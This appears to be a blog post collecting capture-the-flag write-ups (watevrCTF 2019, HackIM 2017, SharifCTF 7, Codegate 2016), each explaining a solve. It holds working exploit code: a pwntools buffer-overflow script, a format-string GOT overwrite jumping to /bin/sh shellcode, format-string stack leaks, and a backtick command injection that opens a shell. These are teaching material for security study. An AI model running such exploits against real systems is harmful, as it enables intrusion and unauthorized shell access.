Voting Machine 1 (watevrCTF 2019)

A simple buffer overflow challenge where you have to overwrite the saved return address (RIP) with the address of 'super_secret_function' (the function that prints the flag).

Idea to solve the challenge:

[*] The offset to reach RIP is 10 bytes; overwrite RIP with 0x400807 (the address of super_secret_function) to print the flag.

Exploit:

from pwn import *   # Python 2 pwntools script; its output is piped straight into nc

super_secret_function = 0x400807        # address of the function that prints the flag
payload = "A"*10                        # padding: 10 bytes up to the saved return address
payload += p64(super_secret_function)   # overwrite RIP (64-bit little-endian)
print payload                           # Python 2 print: writes the raw payload plus a newline to stdout

➜ pwn python payload.py| nc 13.48.67.196 50000

Flag: watevr{w3ll_th4t_w4s_pr3tty_tr1v1al_anyways_https://www.youtube.com/watch?v=Va4aF6rRdqU}

HackIM-2017 (Exploitation – 200)

An ELF 32-bit LSB executable, not stripped, was given.
It is a menu-driven "Book Manager" program with Insert, List, Search, Delete and Exit options.
If you go through the search function you will find a format string vulnerability, and the protections on the binary are:

CANARY    : ENABLED
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : Partial

As NX is disabled, we can execute shellcode from the heap. The idea for solving the challenge:
[*] Leak a heap address through the format string vulnerability
[*] Write the shellcode through the insert function (the book name is stored on the heap)
[*] Overwrite the GOT entry of strchr with the leaked heap address using the format string vulnerability, so the next strchr call lands in the shellcode

Here is the exploit

from pwn import *
import format   # the author's own helper module, not included in the post;
                # pwntools' fmtstr_payload(11, {got_strchr: heap}) builds the
                # equivalent write, assuming '11' is the same argument offset

got_strchr = 0x804b038                  # strchr@GOT: writable because RELRO is only partial
shellcode = asm(shellcraft.linux.sh())  # i386 /bin/sh shellcode (pwntools default context)

def insert(name, idx=0):
    """Menu option 1: store a book name (here, the shellcode) on the heap."""
    p.sendline("1")
    p.recvuntil("book name: ")
    p.sendline(name)
    p.sendlineafter("book id: ", str(idx))

def search(query, choice=False):
    """Menu option 3: the query is passed to printf as the format string."""
    p.sendline("3")
    p.recvuntil("query: ")
    p.sendline(query)
    p.recvuntil("Searching with: ")
    if choice:
        # the program echoes the formatted query; parse the leaked pointer
        addr = int(p.recvline().strip(), 16)
        p.recvline()
        return addr

#p = process("level1.bin")
p = remote("34.198.96.6", 9001)
insert(shellcode)                                   # shellcode now lives on the heap
heap = search('0x%7$x', True)                       # 7th stack argument is a heap pointer
log.success("{}".format(hex(heap)))
payload = format.makepayload(heap, got_strchr, '11')  # write `heap` into strchr@GOT, argument offset 11
search(payload)                                     # printf performs the write; the next strchr call runs the shellcode
p.interactive()

SharifCTF 7 pwn-50 (Guess)

In this challenge no binary was given; you are supposed to connect over netcat and guess.

I was just brute-forcing, and from offset 135 I started getting the flag:

%136$lx
5443666972616853
Hidden string is at somewhere.
%137$lx
3832346435617b46
Hidden string is at somewhere.
%138$lx
Hidden string is at somewhere.
6237636363323336
%139$lx
Hidden string is at somewhere.
6136633735336466
%140$lx
Hidden string is at somewhere.
3561383761383231
%141$lx
Hidden string is at somewhere.
7fc7007d6338

You will get the flag through this script (each leaked value is a little-endian 64-bit word, so its bytes are reversed):

>>> a = ["5443666972616853","3832346435617b46","6237636363323336","6136633735336466","3561383761383231","7fc7007d6338"]
>>> for x in a:              # iterate over every leak; the original range(1,7) skipped a[0] and ran past the end
...   b = x.decode('hex')
...   print b[::-1]          # reverse the bytes of each word (little-endian to string order)
... 
SharifCT
F{a5d428
632ccc7b
fd357c6a
128a78a5
8c}
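The reversal above works because each %N$lx value is one little-endian 64-bit stack word. The following is an added example (not the author's script) that generalizes it: it restores the leading zero bytes that %lx omits from the last word, skips stack words that are not text, and stops at the NUL that terminates the C string. The first list entry is a constructed pointer value, added only so the scan has something to skip.

```python
import string

# Constructed sample input: the %136$lx .. %141$lx leaks shown above, with one
# made-up non-text stack word in front (not from the challenge).
LEAKS = [
    "7ffd2b7e1a90",      # constructed: looks like a stack pointer, not part of the flag
    "5443666972616853",  # %136$lx
    "3832346435617b46",  # %137$lx
    "6237636363323336",  # %138$lx
    "6136633735336466",  # %139$lx
    "3561383761383231",  # %140$lx
    "7fc7007d6338",      # %141$lx: shorter because %lx prints no leading zero bytes
]

# printable ASCII minus control whitespace (space itself stays allowed)
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")

def word_to_bytes(hexword, width=8):
    """One %lx value is a little-endian machine word; decode it to memory order.
    int.to_bytes puts back the leading zero bytes that %lx leaves out."""
    return int(hexword, 16).to_bytes(width, "little")

def looks_like_text(chunk):
    """A word is 'text' if every byte up to the first NUL is printable ASCII."""
    body = chunk.split(b"\x00", 1)[0]
    return len(body) > 0 and all(b in PRINTABLE for b in body)

def reassemble(leaks, width=8):
    """Skip non-text words, then join consecutive text words until the NUL that
    ends the C string; whatever sits on the stack after it is not part of it."""
    raw = bytearray()
    for w in leaks:
        chunk = word_to_bytes(w, width)
        if not raw and not looks_like_text(chunk):
            continue                      # still before the string
        if not looks_like_text(chunk):
            break                         # past the end of the string
        raw += chunk
        if b"\x00" in chunk:
            break                         # terminator found inside this word
    return bytes(raw).split(b"\x00", 1)[0].decode("ascii")

if __name__ == "__main__":
    print(reassemble(LEAKS))   # SharifCTF{a5d428632ccc7bfd357c6a128a78a58c}
```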

MIC Check (Codegate CTF-2016)

This is a challenge from Codegate CTF and one of the simpler ones that I solved. As the source code was given, it was easier to analyze. There was a simple command injection, but most characters were blocked. By looking at this page I got the idea: there was one character that was not blocked, the backtick (`). So I made use of that and got a shell. This is how I solved the challenge.

mic@ubuntu:~$ ./miccheck
input path :`sh`
cat mic.flag.txt
/bin/ls: cannot access /dev/let: No such file or directory
/bin/ls: cannot access the: No such file or directory
/bin/ls: cannot access hacking: No such file or directory
/bin/ls: cannot access begins: No such file or directory

The flag is "let the hacking begins".

Even after thinking about it a lot, I didn't understand exactly how I got it done. If anyone knows how it worked, please comment below.